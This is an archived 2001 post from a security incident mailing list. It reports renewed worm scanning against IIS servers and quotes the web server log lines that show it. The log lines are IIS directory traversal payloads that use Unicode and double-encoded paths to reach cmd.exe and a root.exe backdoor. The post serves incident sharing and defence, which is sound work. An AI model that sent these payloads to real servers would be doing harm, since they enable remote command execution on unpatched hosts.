Security Incidents mailing list archives

Previous By Date Next
Previous By Thread Next

Rekindled sploit scanning?

From: Aj Effin Reznor <aj () reznor com>
Date: Tue, 18 Sep 2001 07:08:04 -0700 (PDT)
Looks like a fair amount of traffic this morning amongst compromised NT/2k boxen.

the 63.x.y.z as well as the 65.x.y.z is seeing a fair amount of traffic, similar to the following:



aa.bb.cc.dd - - [18/Sep/2001:06:27:47 -0700] "GET /scripts/root.exe?/c+dir HTTP/1.0" 404 328 "-" "-"
aa.bb.cc.dd - - [18/Sep/2001:06:27:47 -0700] "GET /MSADC/root.exe?/c+dir HTTP/1.0" 404 326 "-" "-"
aa.bb.cc.dd - - [18/Sep/2001:06:27:47 -0700] "GET /d/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 336 "-" "-"
aa.bb.cc.dd - - [18/Sep/2001:06:27:47 -0700] "GET /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 336 "-" "-"
aa.bb.cc.dd - - [18/Sep/2001:06:27:47 -0700] "GET /scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 350 
"-" "-"
aa.bb.cc.dd - - [18/Sep/2001:06:27:47 -0700] "GET /_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir 
HTTP/1.0" 404 367 "-" "-"
aa.bb.cc.dd - - [18/Sep/2001:06:27:47 -0700] "GET /_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir 
HTTP/1.0" 404 367 "-" "-"
aa.bb.cc.dd - - [18/Sep/2001:06:27:47 -0700] "GET 
/msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 383 "-" 
"-"
aa.bb.cc.dd - - [18/Sep/2001:06:27:47 -0700] "GET /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 349 
"-" "-"
aa.bb.cc.dd - - [18/Sep/2001:06:27:47 -0700] "GET /scripts/..%c0%2f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 349 
"-" "-"
aa.bb.cc.dd - - [18/Sep/2001:06:27:47 -0700] "GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 349 
"-" "-"
aa.bb.cc.dd - - [18/Sep/2001:06:27:47 -0700] "GET /scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 349 
"-" "-"
aa.bb.cc.dd - - [18/Sep/2001:06:27:47 -0700] "GET /scripts/..%%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 333 
"-" "-"
aa.bb.cc.dd - - [18/Sep/2001:06:27:47 -0700] "GET /scripts/..%%35c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 333"-" 
"-"
aa.bb.cc.dd - - [18/Sep/2001:06:27:47 -0700] "GET /scripts/..%25%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404350 
"-" "-"
aa.bb.cc.dd - - [18/Sep/2001:06:27:47 -0700] "GET /scripts/..%252f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 350"-" 
"-"


log times are PST.


-aj.



----------------------------------------------------------------------------
This list is provided by the SecurityFocus ARIS analyzer service.
For more information on this free incident handling, management 
and tracking system please see: http://aris.securityfocus.com
Previous By Date Next
Previous By Thread Next

Current thread: